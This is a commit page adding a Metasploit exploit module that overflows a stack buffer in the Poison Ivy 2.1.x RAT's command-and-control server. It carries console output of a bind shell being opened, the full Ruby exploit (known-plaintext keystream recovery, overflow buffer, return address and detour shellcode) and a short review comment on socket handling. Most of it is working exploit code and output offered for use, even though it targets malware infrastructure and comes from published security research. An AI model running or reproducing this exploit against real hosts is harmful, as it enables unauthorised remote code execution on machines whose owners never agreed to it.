Commit 290e1eb

This module exploits a previously unknown stack buffer overflow vulnerability in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't require knowledge of the secret key as it abuses a flaw in the cryptographic protocol. Note that this is a different vulnerability from the one affecting versions 2.2.0 and up (https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof). See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware for details.

## Console output

Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is set to 'pivypass' and unknown to the attacker).

### Version 2.1.4

```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...
[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
1 parent 0a0e7ab commit 290e1eb

File tree

1 file changed

+187
-0
lines changed

@@ -0,0 +1,187 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Exploit::Remote
9+
Rank = NormalRanking
10+
11+
include Msf::Exploit::Remote::Tcp
12+
13+
def initialize(info = {})
14+
super(update_info(info,
15+
'Name' => 'Poison Ivy 2.1.x C2 Buffer Overflow',
16+
'Description' => %q{
17+
This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.
18+
The exploit does not need to know the password chosen for the bot/server communication.
19+
},
20+
'License' => MSF_LICENSE,
21+
'Author' =>
22+
[
23+
'Jos Wetzels' # Vulnerability Discovery, exploit & Metasploit module
24+
],
25+
'References' =>
26+
[
27+
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ],
28+
],
29+
'DisclosureDate' => 'Jun 03 2016',
30+
'DefaultOptions' =>
31+
{
32+
'EXITFUNC' => 'thread',
33+
},
34+
'Payload' =>
35+
{
36+
'Space' => 0x847 # limited by amount of known plaintext (hard upper limit is 0xFFD)
37+
},
38+
'Platform' => 'win',
39+
'Targets' =>
40+
[
41+
[
42+
'Poison Ivy 2.1.4 on Windows XP SP3',
43+
{
44+
'Ret' => 0x00469159, # jmp esp from "Poison Ivy 2.1.4.exe"
45+
'StoreAddress' => 0x00520000, # .tls section address from "Poison Ivy 2.1.4.exe"
46+
'InfoSizeOffset' => 0x1111, # offset of InfoSize variable
47+
'DecompressSizeOffset' => 0x1109, # offset of DecompressSize variable
48+
'Packet2Offset' => 0xB9E # offset of second packet within server's response
49+
}
50+
]
51+
],
52+
'DefaultTarget' => 0
53+
))
54+
55+
register_options(
56+
[
57+
Opt::RPORT(3460)
58+
], self.class)
59+
60+
end
61+
62+
# XOR two strings
63+
def xor_strings(s1, s2)
64+
s1.unpack('C*').zip(s2.unpack('C*')).map{ |a,b| a ^ b }.pack('C*')
65+
end
66+
67+
# Obtain keystream using known plaintext
68+
def get_keystream(ciphertext, knownPlaintext)
69+
if(ciphertext.length < knownPlaintext.length)
70+
return xor_strings(ciphertext, knownPlaintext[0, ciphertext.length])
71+
else
72+
return xor_strings(ciphertext, knownPlaintext)
73+
end
74+
end
75+
76+
# Apply keystream to plaintext
77+
def use_keystream(plaintext, keyStream)
78+
if(keyStream.length > plaintext.length)
79+
return xor_strings(plaintext, keyStream[0, plaintext.length])
80+
else
81+
return xor_strings(plaintext, keyStream)
82+
end
83+
end
84+
85+
def check
86+
connect
87+
# Poke
88+
sock.put("\x01")
89+
# Fetch response
90+
response = sock.get_once(6)
91+
92+
if (response == "\x89\xFF\x90\x0B\x00\x00")
93+
vprint_status("Poison Ivy C&C version 2.1.4 detected.")
94+
return Exploit::CheckCode::Appears
95+
elsif (response == "\x89\xFF\x38\xE0\x00\x00")
96+
vprint_status("Poison Ivy C&C version 2.0.0 detected.")
97+
return Exploit::CheckCode::Safe
98+
end
99+
100+
return Exploit::CheckCode::Safe
101+
end
102+
103+
def exploit
104+
# Known plaintext from C2 packet
105+
knownPlaintext1 = "\x89\x00\x69\x0c\x00\x00"
106+
knownPlaintext2 = "\x69\x0c\x00\x00\x44\xb8\x00\x04\x07\x00\x6d\x70\x72\x2e\x64\x00\x6c\x6c\x05\x0c\x00\x61\x76\x69\x20\x63\x61\x70\x33\x32\x01\x70\x06\x0b\x00\x00\x70\x73\x74\x6f\x72\x65\x63\x01\x01\x34\x08\x0b\x00\x73\x68\x65\x6c\x02\x6c\x03\x6c\x0a\x09\x00\x67\x64\x69\x01\x03\x2c\x0b\x0c\x00\x69\x70\x68\x6c\x10\x70\x61\x70\x69\x01\x50\x0c\x0b\x01\x20\x63\x72\x79\x70\x74\x03\x38\x02\x00\x00\x1d\x03\x00\x00\x00\x55\x8b\xec\x00\x81\xc4\x04\xf0\xff\xff\x50\x81\x00\xc4\x64\xfa\xff\xff\x53\x56\x57\x00\x8b\xf1\x89\x55\xdc\x89\x45\xe0\x00\x8b\x5d\xe0\x8b\x83\x17\x07\x00\x80\x00\x89\x45\xb8\x8b\x83\xc4\x00\x2c\x10\x89\x45\xe8\x8b\x00\x0b\x40\x08\x05\x02\x12\x00\x3b\x89\x45\xe4\x64\xff\x35\x01\x00\x16\x00\x8f\x45\xec\xff\x75\xe8\x00\x8f\x45\xf0\xff\x75\xe4\x8f\x45\x80\xf4\x8d\x45\xec\x64\x89\x05\x01\x18\x00\x89\x65\xf8\x89\x6d\xfc\x8b\x45\x40\xdc\x33\xd2\x89\x50\x02\x00\x07\xc6\x00\x00\x89\xc6\x45\xbf\x00\x83\xbb\x02\xd8\x01\x1e\x0f\x84\x93\x02\x00\x00\x29\x00\x52\x05\xf8\x00\x07\x50\x00\x08\xff\x90\x22\xe0\x00\x09\x8d\x83\xe0\x00\x1e\x50\x8d\x08\x85\x65\xea\x00\x4c\xff\x53\x04\x85\x00\xf6\x74\x14\x83\x7e\x04\x00\x7e\x22\x0e\x80\x21\x8b\x56\x04\x00\x26\x33\xc0\x40\x89\x46\x08\xc7\x45\xc0\x00\x17\x00\x09\x80\x05\x45\xc8\x01\x02\xc4\x8d\x45\xc4\x50\x50\x8d\x45\xc8\x00\x25\xc0\x03\x27\x6c\x41\x80\x0f\x6a\x04\x68\x00\x10\x81\x33\xc8\x00\x50\x6a\x00\xff\x53\x2c\x89\x45\x02\xd4\x06\x40\xdb\x01\x00\x00\x68\x51\x80\x14\x00\x00\x8d\x85\x67\xeb\x01\x36\x0c\x93\x90\x00\x3d\x81\x25\xd8\x33\xff\x80\x80\x7d\xbf\x00\x75\x34\xbf\x06\x80\x08\xee\x57\x00\x3c\x00\x48\x84\x11\x8c\x81\x08\x84\x18\x06\x03\x55\x04\x56\x08\x00\x70\x01\x00\x58\x1f\x02\x58\x19\x00\x8b\x46\x04\x2b\x46\x08\x3d\xfc\x00\x0f\x00\x00\x7d\x05\x89\x45\xd8\x20\xeb\x07\xc7\x45\xd8\x81\x06\x01\x7d\x00\xd8\x83\x7d\xd8\x00\x0f\x86\x58\x01\x00\x41\x29\x7d\xd8\x8b\x45\xd8\x89\x14\x45\xcc\x03\x09\x0f\x00\x09\x69\x45\xc8\x81\x81\x09\x89\x45\xd0\x8b\x45\xd4\x00\x35\x04\xcc\x50\x44\x31\xd0\x50\x8d\x47\x08\x18\x8d\x84\x05\xc2\x22\x40\
x0d\x50\x8b\x06\x00\x33\xd2\x52\x50\x8b\x46\x08\x99\x00\x03\x04\x24\x13\x54\x24\x04\x83\x14\xc4\x08\x47\x40\x70\x40\x40\x85\xc0\x74\x62\x30\xc3\x17\x8b\x45\xcc\xd3\x0b\xc8\x14\xff\x86\x93\xc1\x37\x40\x0a\x3b\x45\xd8\x72\xee\x0d\xa0\x6a\x04\x8d\x45\xd8\x80\x28\x04\x85\x28\x21\x83\x13\x83\x45\xcc\x04\x01\x1f\x8d\x47\x17\x06\x06\x89\x02\x85\x7a\x08\x81\x0f\xcc\x50\x8d\x0c\x84\x3d\x88\x5a\xc1\x0e\x03\x7d\xcc\x57\x59\x84\x5a\x8b\x83\x41\x8f\x40\x38\xe0\xc0\x00\xb8\x08\xff\x90\xa4\x40\x38\x84\xc0\x74\x13\x00\x85\xf6\x0f\x84\x23\xfe\xff\xff\x41\x40\x3a\x01\x46\x08\xe9\x18\x80\x02\x68\x0e\x02\x40\x52\xc5\x91\x82\x76\x68\x00\x80\x00\x84\x00\x6a\x00\x9d\xd4\x50\xff\x53\x00\x37\x2a\xb8\xc8\x9e\xe4\x00\x12\x90\x01\x00\x5f\x5e\x00\x5b\x8b\xe5\x5d\xc3\x76\x00\x19\x23\x80\x0f\xc1\xc8\x83\xc4\xe4\x41\xc6\x5d\x10\x20\x8b\x45\x08\x8b\xb0\x01\xc5\x8b\x80\xc9\x45\xc4\x86\xd8\x00\x09\x05\xdd\x80\x84\x68\xc4\x00\x0c\x83\x3b\x00\x7e\x17\x8b\x13\x00\x3b\x50\x04\x74\x10\x8b\x13\x81\x00\xc2\xff\x1f\x00\x00\x81\xe2\x00\x00\xe0\xff\xff\x89\x13\x8b\x38\x8b\x00\xd7\x8b\x0b\x3b\x48\x0c\x74\x60\x81\xc0\x04\x75\x1b\x57\xff\x96\xdc\x60\x0c\xb4\x8b\xf8\x00\x01\xe0\x00\x01\xc0\x00\xe4\xc0\x00\x00\x33\xd2\xeb\x40\x83\x78\x0c\x00\x00\x75\x18\x8b\x03\x50\x6a\x02\xff\x2c\x96\xe8\x80\x02\x82\x04\xec\x01\x01\xd0\xeb\x26\x22\x00\x05\x0a\x07\x6a\x02\x20\x05\x57\xff\x9c\x56\x60\x00\x03\x63\x04\xc2\x1d\x8b\xc2\x03\x1e\x08\xc2\x0c\x00\xa0\x1c\x55\x51\x89\x0c\x00\x24\x8b\xfa\x8b\xf0\x8b\xc6\x8b\x02\xa8\x42\x1d\xdf\x54\x57\x56\xff\x95\x01\xc1\x1c\x89\x03\x8b\x04\x24\x89\x43\x08\x0c\x5a\x5d\x20\x06\xc3\x71\x00\x21\x43\xa0\x1e\x60\x06\x8b\xc8\x8b\xb1\x22\x05\xda\x60\x33\xc9\xff\x96\xd4\xa0\x0f\x20\x68\x43\x02\x04\x81\x00\x08\x5e\x5b\xc3\x72\x00\x82\x2a\xec\x04\xca\x33\xdb\x89\x19\x60\x00\xd4\x59\x04\x81\x00\x08\x81\x00\x0c\x45\x07\x00\x06\x58\x73\x00\xa6\x01\x06\x80\x93\x51\xc1\x2e\x55\x22\x0c\xc1\x2e\xf0\x8b\xbe\x63\x0c\x83\x7b\x00\x08\x00\x7c\x53\x83\x7d\x14\x00\x00\x7c\x4d\x8b\x4b\x08\x03\x4d\x14\x00\x89\x4d\xfc\
x83\x7d\xfc\x00\x7e\x80\x3e\x8b\x4d\xfc\x3b\x4b\x04\x00\x2b\x91\xe1\x00\x0c\x7e\x09\xe0\x01\xff\x97\xe1\x11\xa0\x8b\x45\xfc\x89\x43\x00\x50\x14\x40\x46\x00\x10\x50\x8b\x03\x03\x43\x08\x50\x0c\xff\x96\xe3\x5c\x20\x03\x08\x8b\x45\x14\x10\xeb\x02\x33\xc0\xa0\x1a\x59\x5d\xc2\xc0\x10\x00\x8b\xc0\x53\x56\x86\x1a\x9c\x15\x18\x74\x00\x3e\x00\x1e\xa8\x44\x7d\x14\x8b\x50\x55\x08\x8b\x82\x82\x15\x8a\xa2\x44\x4d\x90\xe8\x8b\x80\xd0\x80\x04\x05\x85\xc0\x1a\x05\xbf\x44\x00\xe4\xa6\x5d\x0c\x8b\x43\x08\x00\x85\xc0\x7c\x28\x85\xff\x7c\x24\x00\x8b\x73\x04\x2b\xf0\x85\xf6\x7e\x00\x1b\x3b\xfe\x7d\x02\x8b\xf7\x56\x00\x8b\x0b\x03\xc8\x51\x8b\x45\x10\x08\x50\xff\x92\xc1\x18\x01\x73\x08\xeb\xc2\x07\xa2\x39\x33\xf6\x8b\xc6\xe0\x18\x00\x58\x77\x02\x19\x9f\x28\x9f\x28\xfc\x9f\x28\x9f\x28\x3a\x3e\x75\x1c\x00\x2d\x21\x3e\xdf\x4f\xc8\x4f\x77\x01\x67\x00\x85\xfd\x47\x00\x78\x01\x6e\x74\x00\xbc\x88\x00\x79\x01\x6a\x6b\xdf\x00\x5c\x00\x7a\x01\xc3\x53\xa3\x83\x00\x00\x7b\x01\xb5\xad\x12\x2e\x00\x00\x18\x01\x93\xae\x6a\x9d\x00\x1c\x00\x01\x8c\xad\x5d\xdb\x00\x1f\x03\x00\x4d\x26\xab\x1c\x00\x20\x01\xc4\x00\x09\x78\x78\x00\x22\x03\x23\xd5\x00\x1f\xda\x00\x23\x01\x60\x3b\x66\x00\x86\x00\x24\x07\x69\x5b\x5d\xbb\x00\x00\x25\x01\x75\xc0\xd4\x44\x00\x00\x45\x01\x75\xd7\xd0\xa7\x00\x46\x00\x01\x09\xb4\x58\x3b\x00\x47\x01\x00\xc7\x69\x89\xc3\x00\x48\x01\x17\x00\x3f\x53\x1e\x00\x49\x01\x69\x1f\x00\x19\xf0\x00\x4b\x03\x0b\xb5\xf9\x00\x49\x00\x7c\x05\x2c\x88\x92\x65\x90\x00\x03\x00\xb6\xc6\xe9\xf0\xf7\xe3\xe8\x00\xf0\x89\x75\xb0\x8b\x45\xb0\x8b\x0e\x98\x22\x41\x00\x01\x46\x86\x43\x0c\x05\xab\x07\x3f\xe8\x01\x11\x93\x20\x8d\x55\x9c\x8b\xc6\x98\xff\x93\xc8\x20\x24\x01\x05\x80\xdc\xa0\x01\x00\x56\x8b\xf0\x8d\xbd\x6c\xff\xff\x84\xff\xa5\x00\x00\x5e\xc7\x45\xc8\x20\x6e\x32\x00\xb1\x6f\x8d\x85\x51\x01\x70\x2e\xb0\x8b\x02\x80\x82\x52\xff\x53\x7c\x8d\x85\x7c\x11\x90\x02\x50\xff\x93\xc0\x4f\x00\xff\xb5\x62\x70\xc0\x00\xff\x93\x88\x50\x04\x61\x02\xff\xa0\x50\x24\x89\x45\xc8\x81\x57\xc8\x70\x66\xc0\x9c\x50\x56\xff\x93\xcc\
x90\x06\x20\x05\x4e\xff\x10\x02\xda\x73\xd0\x07\xff\x50\x00\x74\xcc\x9d\x43\x76\xcc\x10\x05\xc1\x27\xf1\x09\x4d\xcc\x20\x0a\x0c\x53\x6c\xf6\x55\x70\x66\x45\xb0\xff\x50\xf2\x30\x40\x40\x45\xc8\xe1\x02\xb0\x77\x12\x58\x0f\x05\x3f\x0b\x05\x01\x78\x0f\x05\xb1\x63\xd2\x07\x30\x5b\xb0\x8d\x0c\x88\xeb\x90\x09\x41\x02\xc6\xff\x53\x6c\xe8\xc7\x85\xd0\xa0\x5e\x9c\x11\x01\x92\x00\x40\x09\xca\x94\xc0\x00\x68\x18\x01\x8d\x45\x66\x0d\x71\x0e\x0a\x84\x79\x0e\x6a\x60\x41\xb0\x05\x57\x04\x94\x00\x00\x5a\x01\x01\xd0\x06\x05\x5b\x5c\x01\x39\x30\x01\x8b\x80\x71\x13\x90\x7c\xb0\x00\xff\x90\x16\xa4\x80\x06\xf0\x06\x14\x91\x19\xf8\xff\x93\x16\x24\x70\x00\xe0\x00\x18\x60\x00\x89\x45\xc4\x2c\x68\x00\x70\x00\x69\x02\x1c\xf0\x00\x6a\x0f\x35\x66\x02\x20\xe1\x00\x0a\x02\x02\x31\x05\x0f\x31\x13\x50\x97\xb0\x97\x68\xf4\x70\x01\xff\x55\xd8\xc0\x0f\x31\x2b\x45\xe0\x1b\xb2\x98\x50\x01\xee\x8b\xa0\x8d\x9a\x03\x20\x89\xb0\x06\x08\x92\x05\x90\x77\x06\xe0\x39\x0c\xa1\x17\xb8\x6a\x00\x6a\x01\x03\x70\x5f\xb1\x18\x0c\x89\x45\xc0\x83\x7d\xb0\xc0\xff\x74\x41\x40\x01\xb0\x22\xbc\x20\x85\x61\x00\x0e\x8d\x85\x94\xf8\xa0\x8f\x31\x01\x68\x80\x7f\x74\x04\x40\x8b\x45\xc0\x30\x0c\x02\x2c\x40\x08\x33\xd2\x83\xfa\xff\x75\x20\x03\x83\xf8\xff\x74\x90\x97\xbc\xb9\x62\x4c\xd0\x0e\x99\xf7\xf9\x00\xa1\x51\x14\xb8\x03\xb9\x06\xc0\x9b\x48\x85\xc0\x72\x20\x40\x20\x89\x45\xac\x8d\xbd\x01\x05\x6a\x4c\x02\x57\x68\x17\x83\xc7\x4c\xff\x4d\xac\x4c\x75\xea\xc1\x05\x11\x0f\x50\x14\xd1\x09\xb4\xda\x6a\x40\x95\x43\xd2\x07\x80\x00\xf2\x80\x33\x00\x29\x0a\xb4\xd0\x07\xf0\xd0\x07\x85\xc0\x74\x1c\xcc\x8d\x8d\x41\x01\x95\x1e\x8d\x8d\xb1\x02\xd5\x00\x00\xff\x45\xb4\x83\x7d\xb4\x0a\x75\x98\xbb\x68\x7d\xc0\x34\x40\x05\x8b\x80\x91\x36\x01\x59\x09\xc6\x45\xd3\x01\x8d\x4d\x9c\x28\x8d\x55\xd2\xc1\x29\x08\x93\x03\x93\xc4\x07\xc0\x05\xa2\x52\x63\x52\xc3\x9b\x09\xf6\x4c\x00\x1f\x0b\x00\x9c\x09\x80\xa3\x44\x00\xba\x00\x9d\x09\x4d\x4b\x58\x5a\x00\x00\x6b\x01\x3f\x05\x3b\x6a\x00\x00\xb8\x09\x9c\xb5\x85\x98\x00\xb9\x00\x09\xf0\x76\xf1\xce\x00\xa9\x00\x0e\
x82\x20\x10\xb1\x5e\x82\x69\x5d\x14\x8b\x7d\x01\xf0\x9e\xff\x00\x33\xf6\x6a\x00\x53\x09\xc0\x58\x03\xc6\xf0\x0b\x0c\x50\xff\x57\x0a\x18\x31\x13\x10\x10\x0c\x0c\x03\xf0\x2b\x00\xd8\x85\xdb\x75\xdf\xc6\x45\xff\xb0\x01\x8a\x45\xff\x20\x07\x12\x66\x90\xa2\x4e\x0c\x8b\xe9\x84\x76\x32\x42\x55\xff\x53\x70\x00\x88\x04\x24\x6a\x01\x8d\x44\x24\x0c\x04\x50\x30\x77\x72\x38\x33\xc0\x8a\x04\x18\x24\x50\x55\xe5\x00\xa3\x77\x1b\x00\x3e\x7b\x81\x08\x4f\x04\x00\x4f\x04\xc1\x3c\x4f\x04\x60\x76\xbd\x00\x02\xf7\x6c\x55\xd8\x00"
107+
108+
# detour shellcode (mov eax, StoreAddress; jmp eax)
109+
detourShellcode = "\xB8" + [target['StoreAddress']].pack("V") # mov eax, StoreAddress
110+
detourShellcode << "\xFF\xE0" # jmp eax
111+
112+
# Padding where necessary
113+
compressedBuffer = payload.encoded + "\x90" * (0xFFD - payload.encoded.length)
114+
115+
# Construct exploit buffer
116+
exploitBuffer = "A" * 4 # infoLen (placeholder)
117+
exploitBuffer << compressedBuffer # compressedBuffer
118+
exploitBuffer << "\xFF" * 0x104 # readfds
119+
exploitBuffer << "C" * 4 # compressionType
120+
exploitBuffer << "D" * 4 # decompressSize (placeholder)
121+
exploitBuffer << "E" * 4 # pDestinationSize
122+
exploitBuffer << "F" * 4 # infoSize (placeholder)
123+
exploitBuffer << "G" * 4 # headerAllocSize
124+
exploitBuffer << [target['StoreAddress']].pack("V") # decompressBuffer
125+
exploitBuffer << "H" * 2 # decompressBuffer+4
126+
exploitBuffer << "I" * 6 # lParam
127+
exploitBuffer << "J" * 8 # timeout
128+
exploitBuffer << "K" * 4 # hWnd
129+
exploitBuffer << "L" * 4 # s
130+
exploitBuffer << "M" * 4 # old EBP
131+
exploitBuffer << [target['Ret']].pack("V") # EIP
132+
exploitBuffer << [target['StoreAddress']].pack("V") # arg_0
133+
exploitBuffer << detourShellcode # detour to storage area
134+
135+
# Calculate values
136+
allocSize = exploitBuffer.length + 1024
137+
infoLen = payload.encoded.length
138+
infoSize = (infoLen + 4)
139+
140+
# Handshake
141+
connect
142+
print_status("Performing handshake...")
143+
144+
# Poke
145+
sock.put("\x01")
146+
147+
# Fetch response
148+
response = sock.get(target['Packet2Offset'] + knownPlaintext1.length + infoSize)
149+
150+
eHeader = response[target['Packet2Offset'], 6]
151+
eInfo = response[target['Packet2Offset'] + 10..-1]
152+
153+
if ((eHeader.length >= knownPlaintext1.length) and (knownPlaintext1.length >= 6) and (eInfo.length >= knownPlaintext2.length) and (knownPlaintext2.length >= infoSize))
154+
# Keystream derivation using Known Plaintext Attack
155+
keyStream1 = get_keystream(eHeader, knownPlaintext1)
156+
keyStream2 = get_keystream(eInfo, knownPlaintext2)
157+
158+
# Set correct infoLen
159+
exploitBuffer = [infoLen].pack("V") + exploitBuffer[4..-1]
160+
161+
# Set correct decompressSize
162+
exploitBuffer = exploitBuffer[0, target['DecompressSizeOffset']] + [infoSize].pack("V") + exploitBuffer[(target['DecompressSizeOffset'] + 4)..-1]
163+
164+
# Build packet
165+
malHeader = use_keystream("\x89\x01" + [allocSize].pack("V"), keyStream1)
166+
167+
# Encrypt infoSize bytes
168+
encryptedExploitBuffer = use_keystream(exploitBuffer[0, infoSize], keyStream2) + exploitBuffer[infoSize..-1]
169+
170+
# Make sure infoSize gets overwritten properly since it is processed before decryption
171+
encryptedExploitBuffer = encryptedExploitBuffer[0, target['InfoSizeOffset']] + [infoSize].pack("V") + encryptedExploitBuffer[target['InfoSizeOffset']+4..-1]
172+
173+
# Finalize packet
174+
exploitPacket = malHeader + [encryptedExploitBuffer.length].pack("V") + encryptedExploitBuffer
175+
176+
print_status("Sending exploit...")
177+
# Send exploit
178+
sock.put(exploitPacket)
179+
else
180+
print_status("Not enough keystream available...")
181+
end
182+
183+
select(nil,nil,nil,5)
184+
disconnect
185+
end
186+
187+
end
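Review bot: in `exploit`, `sock.get(target['Packet2Offset'] + knownPlaintext1.length + infoSize)` passes a byte count where `Rex::IO::Stream#get` takes a timeout in seconds, so the call waits up to several thousand seconds and returns whatever the server happened to send rather than a fixed-length read; use `sock.get_once(length, timeout)` or check `response.length` before slicing it. `response` is also never checked for nil, so a server that closes the connection after the `"\x01"` poke raises `NoMethodError` on `response[target['Packet2Offset'], 6]` instead of a clean `fail_with`. Two smaller points: `check` calls `connect` but never `disconnect`, leaking the socket on every return path, and the "Not enough keystream available..." branch should be `print_error` (or `fail_with`) rather than `print_status`, since the module then falls through to `select`/`disconnect` as if it had succeeded.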
